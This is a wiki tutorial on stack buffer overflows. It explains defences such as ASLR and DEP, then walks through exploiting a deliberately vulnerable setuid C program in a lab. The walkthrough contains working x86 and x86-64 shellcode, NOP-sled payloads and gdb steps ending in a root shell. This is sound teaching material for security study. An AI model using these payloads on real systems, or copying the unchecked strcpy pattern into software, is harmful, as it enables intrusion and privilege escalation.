Difference between revisions of "Buffer overflow"
Revision as of 12:25, 9 May 2012
A buffer overflow, or buffer overrun, is a software error triggered when a program does not adequately control the amount of data copied into a buffer. If that amount exceeds the buffer's preassigned capacity, the remaining bytes are stored in adjacent memory areas, overwriting their original content. This can be exploited by overwriting a function's return address to cause arbitrary code execution and allow access to a vulnerable system.
Buffer overflow requires a basic understanding of assembly and machine code.
Description
A computer receives input, recalls what to do with the input, and then does it. If an attacker on the internet could control the memory of a computer, the computer would remember the wrong thing to do, and execute it because it doesn't know any better. This is what happens during a buffer overflow attack.
The memory of a computer is much like a post office. Each piece of mail goes to a mailbox or a P.O. box, and each P.O. box can only hold one piece of mail at a time. Suppose for a moment that the post office that represents the computer's memory has 500 P.O. boxes. Boxes 1-200 are for data that the user sends into the computer, and boxes 201-500 hold instructions for what to do with that data. If a user sends in 300 pieces of data or mail, there are two scenarios: 1. A secure program would tell the user "I can only hold 200 pieces, I'm not taking any more mail". 2. An insecure program would simply take all the data into boxes 1-300.
In the insecure scenario, when the computer remembers what to do, it lands on P.O. box 201. If the user was an attacker, malicious instructions at P.O. box 201 would be executed! This is why the buffer overflow is such a dangerous vulnerability. In reality, there is a return address that the computer uses to remember where its instructions are. So if an attacker filled up P.O. boxes 1-201, and 201 contained the return address, and the attacker changed the return address to P.O. box 1, the computer would execute the data instead of just keeping it in memory. The attacker therefore has to know enough about the system to know which address the malicious instructions will end up at; otherwise the attacker will not know the correct return address to put into P.O. box 201. In other words, the attacker needs precise aim, or the attack will be unsuccessful.
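The post office analogy can be sketched in C. This is only an illustration under stated assumptions: the names `store_checked` and `store_unchecked` are hypothetical, the 500 boxes are a plain array, and the "insecure" clerk is clamped to the size of the whole post office so that the simulation itself never writes outside the array.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DATA_BOXES  200  /* boxes 1-200 hold user data */
#define TOTAL_BOXES 500  /* boxes 201-500 hold instructions */

/* Secure clerk: accepts at most DATA_BOXES pieces of mail.
 * Returns the number of pieces actually stored. */
size_t store_checked(char boxes[TOTAL_BOXES], const char *mail, size_t count)
{
    assert(boxes != NULL && mail != NULL);
    size_t accepted = count < DATA_BOXES ? count : DATA_BOXES;
    memcpy(boxes, mail, accepted);
    return accepted;
}

/* Insecure clerk: stores everything it is handed, spilling into the
 * instruction boxes. Returns how many instruction boxes were overwritten.
 * (Clamped to TOTAL_BOXES only to keep this simulation in bounds.) */
size_t store_unchecked(char boxes[TOTAL_BOXES], const char *mail, size_t count)
{
    assert(boxes != NULL && mail != NULL);
    size_t stored = count < TOTAL_BOXES ? count : TOTAL_BOXES;
    memcpy(boxes, mail, stored);
    return stored > DATA_BOXES ? stored - DATA_BOXES : 0;
}
```

With 300 pieces of mail, the checked version stores 200 and leaves box 201 untouched, while the unchecked version overwrites the first 100 instruction boxes.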
Defenses
ASLR
Several defenses have been built into the runtime environment in an attempt to keep buffer overflows from being exploited. One of the more recent is ASLR, which stands for Address Space Layout Randomization. Each time the computer reboots and each time a program runs, the address space the program lives in changes. In other words, following the mailbox analogy, the return address will never be in the same mailbox twice. The point is to prevent a buffer overflow exploit from succeeding because the attacker can never aim properly. Unfortunately, attackers have discovered something called "Magic Numbers", which trick a program's error handler and allow an attacker to aim the attack correctly without having to know a return address.
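One way to observe the effect described above is to print the address of a stack variable and compare the output of two separate runs. The following is a minimal sketch; `report_stack_address` is a hypothetical helper name, and the exact addresses (and whether they change) depend on the operating system and its ASLR settings.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Prints the address of a local variable, which lives on the stack.
 * If `seen` is not NULL, the address is also stored there.
 * Returns the number of characters printed, as fprintf does. */
int report_stack_address(FILE *out, uintptr_t *seen)
{
    assert(out != NULL);
    int marker = 0;                        /* any local variable will do */
    uintptr_t address = (uintptr_t)&marker;
    if (seen != NULL) {
        *seen = address;
    }
    return fprintf(out, "stack variable at 0x%" PRIxPTR "\n", address);
}
```

Calling `report_stack_address(stdout, NULL)` from `main` and running the program twice should typically print two different addresses when ASLR is enabled and the same address when it is disabled.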
DEP
Another defense mechanism is DEP, which stands for Data Execution Prevention. It marks data regions of memory, such as the stack, as non-executable. Even if the return address is changed to point into the same memory space as the data, machine code (the code that buffer overflow payloads are crafted in) placed in a data segment will not run. In response, attackers have developed ASCII and polymorphic ASCII machine code, which looks like normal user input instead of machine code.
Containers
An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.
Bypassing protections
With CSA, ASLR, and operating-system-supplied DEP in place, successfully performing a buffer overflow exploit against a system can be extremely difficult. Any attacker who makes it to the point where CSA catches the attempt is already very advanced. To subvert ASLR, DEP, and containers, one must use polymorphic ASCII shellcode and return-oriented programming. Return-oriented programming is used to evade the NX and XD bits, a form of hardware DEP implemented directly in processors. Bypassing modern host-level buffer overflow defenses requires machine code that modifies itself, looks like standard user input, and has all of its own functions built in, in a return-oriented fashion. The return address must always be supplied as raw bytes rather than printable text, so it usually shows up as odd characters such as squares or strange symbols. In a real buffer overflow exploit attempt, the IDS or HIDS context buffer will show four squares or symbols at the end on a 32-bit system, and eight on a 64-bit system.
Learning to count in hex and bitwise math will tell you more about the sizes.
Maximum effectiveness
Sometimes attackers and pen-testers alike use what is called Second Stage Shellcode. Many times firewall rules will prevent any connections outgoing from a server machine and prevent all incoming connections except for connections on the specified server port. Because of this, attackers use what is called Second Stage Shellcode to first find the connection that the exploit originated from, and then send the output of the arbitrary functions back along the first connection. This is done to circumvent firewalls and prevent a firewall from blocking a connection.
Buffer overflows can be used remotely to gain partial or total system access, or locally to escalate privileges and permissions inside the operating system in order to gain system or root level access. The real threat a buffer overflow poses is the "zero-day attack": an exploit for a vulnerability, such as a buffer overflow, that the security world has never seen before. Zero-day or 0day attacks are the most devastating to the security industry, causing worms, viruses, and sometimes even hundreds of thousands of systems to be compromised in a single day.
Causes
Buffer overflows exist because of a combination of insecure language compilers, insecure programmers, and bad CPU architectures that keep the return address of a function call on the stack. A programmer should be able to check input to the data segment with relative ease. Often, however, coders are ignorant of the problem or overlook the flaw, and sometimes a disgruntled employee might even code the vulnerability into an application deliberately for personal gain after the application goes to production.
Example
Disabling ASLR
The first step is to disable ASLR. This allows the featured proof of concept to be successful. There are other methods of bypassing ASLR, but they will not be covered here.
teknical@teknical-vm:~$ sudo -s
[sudo] password for teknical:
root@teknical-vm:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@teknical-vm:~# exit
exit
teknical@teknical-vm:~$
Test application
The test application is below. Note that there is a statically allocated buffer of 100 bytes. This is what will be overflowed. Using strcpy without checking the length of the input against the size of the buffer is a common mistake. Avoiding it is recommended to prevent applications from being exploited.
bof.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char buffer[100];
    strcpy(buffer, argv[1]);
    return 0;
}
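For contrast with bof.c, here is a minimal sketch of a copy that checks the input length against the buffer size first. The function name `copy_checked` is hypothetical and is not part of the test application; it only illustrates the kind of check that bof.c omits.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies src into dst only if it fits, including the terminating NUL.
 * Returns 0 on success. Returns -1 and leaves dst as an empty string
 * if src is too long for a buffer of dst_size bytes. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL && dst_size > 0);
    size_t needed = strlen(src) + 1;   /* +1 for the terminating NUL */
    if (needed > dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, needed);
    return 0;
}
```

In the test application, `strcpy(buffer, argv[1])` could be replaced with a call such as `copy_checked(buffer, sizeof buffer, argv[1])`, with the program exiting when -1 is returned.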
Compiling
For compilation, use the -g option of gcc to include debugging symbols in the binary, which makes debugging easier.
teknical@teknical-vm:~$ gcc -g bof.c -o bof
Following compilation, the vulnerability can then be triggered. This example has a buffer of 100 bytes, so a good first test is 104 bytes, which will result in an overflow. Ruby is used to build a 104-byte string dynamically; Perl is another option.
Potential compile-time protections
teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
*** stack smashing detected ***: ./bof terminated
Teknical says:
Wait... What's this? By default, newer versions of gcc and other modern compilers add stack protection to code at compile time.
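The "stack smashing detected" message comes from a guard value (often called a canary) that is checked before the function returns. The idea can be sketched with a simulated frame. This is an assumption-laden illustration, not how gcc implements its protector: the struct, the fixed `CANARY_VALUE`, and all function names are hypothetical, and the fill is clamped to the struct so the simulation never writes outside it.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define CANARY_VALUE 0x1234567UL  /* arbitrary illustrative guard value */

/* A pretend stack frame: the guard value sits just past the buffer. */
struct guarded_frame {
    char buffer[100];
    unsigned long canary;
};

/* Clears the frame and plants the guard value. */
void frame_init(struct guarded_frame *frame)
{
    assert(frame != NULL);
    memset(frame, 0, sizeof *frame);
    frame->canary = CANARY_VALUE;
}

/* Writes `count` filler bytes from the start of the frame, the way an
 * unchecked copy would. Clamped to the frame size for safety. */
void frame_fill(struct guarded_frame *frame, unsigned char byte, size_t count)
{
    assert(frame != NULL);
    if (count > sizeof *frame) {
        count = sizeof *frame;
    }
    memset(frame, byte, count);
}

/* Returns 1 if the guard value is untouched, 0 if it was overwritten. */
int frame_intact(const struct guarded_frame *frame)
{
    assert(frame != NULL);
    return frame->canary == CANARY_VALUE;
}
```

Filling only the 100-byte buffer leaves the guard intact, while filling the whole frame overwrites it, which is the condition a protected binary detects before aborting.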
Solution for test application
The test application must be compiled without this protection. Stack protection is removed by passing the -fno-stack-protector option to gcc.
teknical@teknical-vm:~$ gcc -g -fno-stack-protector bof.c -o bof
Testing
A setuid binary is used for this example so that the shell obtained is a root shell. Make the bof binary setuid root as shown below:
teknical@teknical-vm:~$ sudo chown root:root ./bof
teknical@teknical-vm:~$ sudo chmod 4755 ./bof
On x86
Following the compilation of the application, the vulnerability can be triggered once again. As stated earlier, 104 bytes are used and this is increased until the vulnerability is triggered.
teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*104'`
teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*108'`
teknical@teknical-vm:~$ ./bof `ruby -e 'print "\x90"*112'`
Segmentation fault
Note that it took 112 bytes to overwrite the saved ebp of the running application. The system is now ready for exploitation attempts. Note also that 116 bytes are required to overwrite the return address on the stack.
On x86-64
This number will vary on x86-64...
xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 100'`
xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 110'`
xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 120'`
Segmentation fault
xo@kingmaker:~$ ./bof `perl -e 'print "\x90" x 119'`
On x86-64 it takes 120 bytes to trigger a segfault. Another important difference is that the return address is 8 bytes wide, matching the 8-byte rsp register rather than the 4-byte esp register.
Disabling DEP
DEP is another protection scheme, which prevents code on the stack from being executed. The 'execstack' tool is used both to check whether a binary has an executable stack and to set it to have one.
Xochipilli says:
Gcc's `-z execstack' parameter can be used to set the stack as executable at compile time.
The -q option will query the current status.
teknical@teknical-vm:~$ sudo execstack -q bof
- bof
Notice the -, which means that the application will NOT have an executable stack. This will prevent successful exploitation.
The -s option is used to set the binary to allow execution on the stack.
teknical@teknical-vm:~$ sudo execstack -s bof
If queried again, an X will appear in its place, which means that the stack is now executable.
teknical@teknical-vm:~$ sudo execstack -q bof
X bof
Debugging
The next step is to start up gdb and begin debugging.
Shellcode analysis
Shellcode is machine code, in flat binary form, that is executed during exploitation of a buffer overflow.
On x86
The following will be used as the argument to the test application:
`ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08 \x31\xc0\x88\x46\x07\x89 \x46\x0c\xb0\x0b\x89\xf3 \x8d\x4e\x08\x8d\x56\x0c \xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff \xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
A few things should be noted when examining the shellcode above. The shellcode used is 45 bytes long. It is a setuid() + /bin/sh shellcode:
\xeb\x1f\x5e\x89\x76\x08 \x31\xc0\x88\x46\x07\x89 \x46\x0c\xb0\x0b\x89\xf3 \x8d\x4e\x08\x8d\x56\x0c \xcd\x80\x31\xdb\x89\xd8 \x40\xcd\x80\xe8\xdc\xff \xff\xff/bin/sh
From the earlier test, it is known that 112 bytes are required to overwrite ebp and another 4 to overwrite the return address. The shellcode is padded with 60 NOPs, so 60 + 45 = 105. Another 7 bytes are therefore needed to reach 112 and overwrite ebp, followed by 4 for the return address. 0x41 ('A') is recommended for this portion because it is easier to spot while debugging. So 7 bytes of 'A' are added, and then 4 more on the end for the return address. 60 + 45 + 7 + 4 = 116, which is the number of bytes needed to overwrite the return address and successfully exploit the target.
On x86-64
The following shellcode is used to spawn a shell:
"\x48\x31\xd2"                              // xor %rdx, %rdx
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  // mov $0x68732f6e69622f2f, %rbx
"\x48\xc1\xeb\x08"                          // shr $0x8, %rbx
"\x53"                                      // push %rbx
"\x48\x89\xe7"                              // mov %rsp, %rdi
"\x50"                                      // push %rax
"\x57"                                      // push %rdi
"\x48\x89\xe6"                              // mov %rsp, %rsi
"\xb0\x3b"                                  // mov $0x3b, %al
"\x0f\x05";                                 // syscall
Or:
\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
This shellcode is 30 bytes long. Reaching the return address takes 120 bytes, and the return address itself takes another 8. To start, use a 60 byte nopsled + 30 byte shellcode + 30 bytes of padding + 8 byte return address, totaling 128 bytes.
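The length arithmetic for both architectures can be double-checked with a few lines of C. This is only a sketch of the sums stated in the text; the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Sizes, in bytes, of the four parts of the command-line argument. */
struct payload_layout {
    size_t nop_sled;
    size_t shellcode;
    size_t padding;
    size_t return_address;
};

/* Number of bytes that come before the return address. */
size_t payload_offset_of_return(const struct payload_layout *layout)
{
    assert(layout != NULL);
    return layout->nop_sled + layout->shellcode + layout->padding;
}

/* Total length of the argument, return address included. */
size_t payload_total(const struct payload_layout *layout)
{
    assert(layout != NULL);
    return payload_offset_of_return(layout) + layout->return_address;
}
```

For the x86 layout {60, 45, 7, 4} this gives an offset of 112 and a total of 116; for the x86-64 layout {60, 30, 30, 8} it gives 120 and 128, matching the figures above.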
Finding the return address
- Starting gdb
teknical@teknical-vm:~$ gdb -q ./bof
Reading symbols from /home/teknical/bof...done.
- Setting a breakpoint inside of the "main" function
(gdb) break main
Breakpoint 1 at 0x80483ed: file bof.c, line 7.
- Starting the application with the command line as discussed above.
On x86
(gdb) r `ruby -e 'print "\x90"*60, "[insert our shellcode here]", "A"*7, "\x41\x41\x41\x41"'`
Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56 \x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x41\x41\x41\x41"'`
Breakpoint 1, main (argc=2, argv=0xbffff474) at bof.c:7
7 strcpy(buffer, argv[1]);
Teknical says:
While stopped in the main function, let's examine the stack. It is known that at least 116 bytes on the stack are required, so 200 words are displayed to make sure all the required space is visible. Another thing to look for is the address of the shellcode on the stack.
(gdb) x/200x $esp
0xbffff340: 0x00119222 0xbffff3e4 0x080481f4 0xbffff3d8
0xbffff350: 0x0012ca54 0x00000000 0x0012fb48 0x00000001
0xbffff360: 0x00000000 0x00000001 0x0012c8f8 0x00293ff4
0xbffff370: 0x00242d19 0x0016d2a5 0xbffff388 0x001549d5
0xbffff380: 0x00293ff4 0x08049ff4 0xbffff398 0x080482e8
0xbffff390: 0x0011e030 0x08049ff4 0xbffff3c8 0x08048439
0xbffff3a0: 0x00294324 0x00293ff4 0x08048420 0xbffff3c8
0xbffff3b0: 0x0016d4a5 0x0011e030 0x0804842b 0x00293ff4
0xbffff3c0: 0x08048420 0x00000000 0xbffff448 0x00154bd6
0xbffff3d0: 0x00000002 0xbffff474 0xbffff480 0x0012f858
0xbffff3e0: 0xbffff430 0xffffffff 0x0012bff4 0x08048245
0xbffff3f0: 0x00000001 0xbffff430 0x0011d626 0x0012cab0
0xbffff400: 0x0012fb48 0x00293ff4 0x00000000 0x00000000
0xbffff410: 0xbffff448 0xee66f487 0x3b1663f8 0x00000000
0xbffff420: 0x00000000 0x00000000 0x00000002 0x08048330
0xbffff430: 0x00000000 0x00123230 0x00154afb 0x0012bff4
0xbffff440: 0x00000002 0x08048330 0x00000000 0x08048351
0xbffff450: 0x080483e4 0x00000002 0xbffff474 0x08048420
0xbffff460: 0x08048410 0x0011e030 0xbffff46c 0x0012c8f8
0xbffff470: 0x00000002 0xbffff5e4 0xbffff5f7 0x00000000
0xbffff480: 0xbffff66c 0xbffff690 0xbffff6a3 0xbffff6b3
0xbffff490: 0xbffff6be 0xbffff70f 0xbffff721 0xbffff74b
0xbffff4a0: 0xbffff76b 0xbffff779 0xbffffc1a 0xbffffc40
0xbffff4b0: 0xbffffc52 0xbffffcae 0xbffffce0 0xbffffceb
0xbffff4c0: 0xbffffd17 0xbffffd64 0xbffffd7a 0xbffffd89
0xbffff4d0: 0xbffffd9c 0xbffffdb3 0xbffffdca 0xbffffdda
0xbffff4e0: 0xbffffdee 0xbffffe23 0xbffffe2c 0xbffffe3d
0xbffff4f0: 0xbffffe4f 0xbffffe63 0xbffffe6b 0xbffffe97
0xbffff500: 0xbffffea8 0xbfffff0a 0xbfffff47 0xbfffff67
0xbffff510: 0xbfffff74 0xbfffff96 0xbfffffaf 0x00000000
0xbffff520: 0x00000020 0x0012d420 0x00000021 0x0012d000
0xbffff530: 0x00000010 0x078bf3ff 0x00000006 0x00001000
0xbffff540: 0x00000011 0x00000064 0x00000003 0x08048034
0xbffff550: 0x00000004 0x00000020 0x00000005 0x00000008
0xbffff560: 0x00000007 0x00110000 0x00000008 0x00000000
0xbffff570: 0x00000009 0x08048330 0x0000000b 0x000003e8
0xbffff580: 0x0000000c 0x000003e8 0x0000000d 0x000003e8
0xbffff590: 0x0000000e 0x000003e8 0x00000017 0x00000001
0xbffff5a0: 0x00000019 0xbffff5cb 0x0000001f 0xbfffffe9
0xbffff5b0: 0x0000000f 0xbffff5db 0x00000000 0x00000000
0xbffff5c0: 0x00000000 0x00000000 0x85000000 0xaaec0f53
0xbffff5d0: 0xb8fc08c0 0xd3d76e6a 0x693bf638 0x00363836
0xbffff5e0: 0x00000000 0x6d6f682f 0x65742f65 0x63696e6b
0xbffff5f0: 0x622f6c61 0x9000666f 0x90909090 0x90909090
0xbffff600: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff630: 0xeb909090 0x76895e1f 0x88c03108 0x46890746
0xbffff640: 0x890bb00c 0x084e8df3 0xcd0c568d 0x89db3180
0xbffff650: 0x80cd40d8 0xffffdce8 0x69622fff 0x68732f6e
The next step is to find the shellcode on the stack. The easiest thing to do here is to look for the NOPs. The address of the NOPs is required so this can be used as the return address on the stack. This will cause execution to resume with the shell code once the function returns.
Note the NOPs above, which fill whole words starting at 0xbffff5f8. 0xbffff610 will be used since it is a cleaner address that still lands inside the NOPs. Written in little-endian byte order, this is "\x10\xf6\xff\xbf".
On x86-64
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68 \x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x41\x41 \x41\x41\x41\x41\x41\x41"'`
Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb \x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b \x0f\x05", "A" x 30, "\x41\x41\x41\x41\x41\x41\x41\x41"'`
(gdb) x/400x $rsp
Xochipilli says:
I truncated this because it was huge.
...
0x7fffffffe510: 0x00000064 0x00000000 0x00000003 0x00000000
0x7fffffffe520: 0x00400040 0x00000000 0x00000004 0x00000000
0x7fffffffe530: 0x00000038 0x00000000 0x00000005 0x00000000
0x7fffffffe540: 0x00000008 0x00000000 0x00000007 0x00000000
0x7fffffffe550: 0xf7ddd000 0x00007fff 0x00000008 0x00000000
0x7fffffffe560: 0x00000000 0x00000000 0x00000009 0x00000000
0x7fffffffe570: 0x00400400 0x00000000 0x0000000b 0x00000000
0x7fffffffe580: 0x000003e8 0x00000000 0x0000000c 0x00000000
0x7fffffffe590: 0x000003e8 0x00000000 0x0000000d 0x00000000
0x7fffffffe5a0: 0x000003e8 0x00000000 0x0000000e 0x00000000
0x7fffffffe5b0: 0x000003e8 0x00000000 0x00000017 0x00000000
0x7fffffffe5c0: 0x00000000 0x00000000 0x00000019 0x00000000
0x7fffffffe5d0: 0xffffe609 0x00007fff 0x0000001f 0x00000000
0x7fffffffe5e0: 0xffffefe1 0x00007fff 0x0000000f 0x00000000
0x7fffffffe5f0: 0xffffe619 0x00007fff 0x00000000 0x00000000
0x7fffffffe600: 0x00000000 0x00000000 0xcc45c200 0xf80e704b
0x7fffffffe610: 0xd5660936 0xff5959b5 0x36387878 0x0034365f
0x7fffffffe620: 0x00000000 0x00000000 0x6d6f682f 0x6f782f65
0x7fffffffe630: 0x6c69662f 0x622f7a65 0x622f666f 0x9000666f
0x7fffffffe640: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe650: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe660: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe670: 0x90909090 0x90909090 0x48909090 0xbb48d231
...
Note that the nopsled fills whole words starting at 0x7fffffffe640, so this address is used as the return address. Converted to little endian and formatted appropriately, this is \x40\xe6\xff\xff\xff\x7f\x00\x00.
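The little-endian conversion used for both return addresses can be checked with a short helper. This is a minimal sketch; the function name `encode_little_endian` is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Writes the low `width` bytes of `value` into `out`,
 * least significant byte first (little-endian order). */
void encode_little_endian(uint64_t value, unsigned char *out, size_t width)
{
    assert(out != NULL && width <= sizeof value);
    for (size_t i = 0; i < width; i++) {
        out[i] = (unsigned char)(value >> (8 * i));
    }
}
```

Encoding 0xbffff610 with a width of 4 yields the bytes 10 f6 ff bf, and encoding 0x7fffffffe640 with a width of 8 yields 40 e6 ff ff ff 7f 00 00, matching the strings given for x86 and x86-64.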
Exploitation
Clear the breakpoint, then restart the application with the same command line argument, but replace the "\x41\x41\x41\x41" at the end of the argument with the return address "\x10\xf6\xff\xbf".
(gdb) clear main
Deleted breakpoint 1
On x86
(gdb) r `ruby -e 'print "\x90"*60, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46 \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89 \xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/teknical/bof `ruby -e 'print "\x90"*60,"\xeb\x1f\x5e \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "A"*7, "\x10\xf6\xff\xbf"'`
process 2262 is executing new program: /bin/sh
# whoami
root
#
On x86-64
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e \x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f \x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
Starting program: /home/xo/filez/bof/bof `perl -e 'print "\x90" x 60, "\x48\x31 \xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50 \x57\x48\x89\xe6\xb0\x3b\x0f\x05", "A" x 30, "\x40\xe6\xff\xff\xff\x7f\x00\x00"'`
process 27319 is executing new program: /bin/dash
$ whoami
xo
$
Xochipilli says:
The x86-64 shellcode used in this example does not call setuid(), so it will execute with the privileges of the exploited application.
YAY! Successful exploitation has occurred.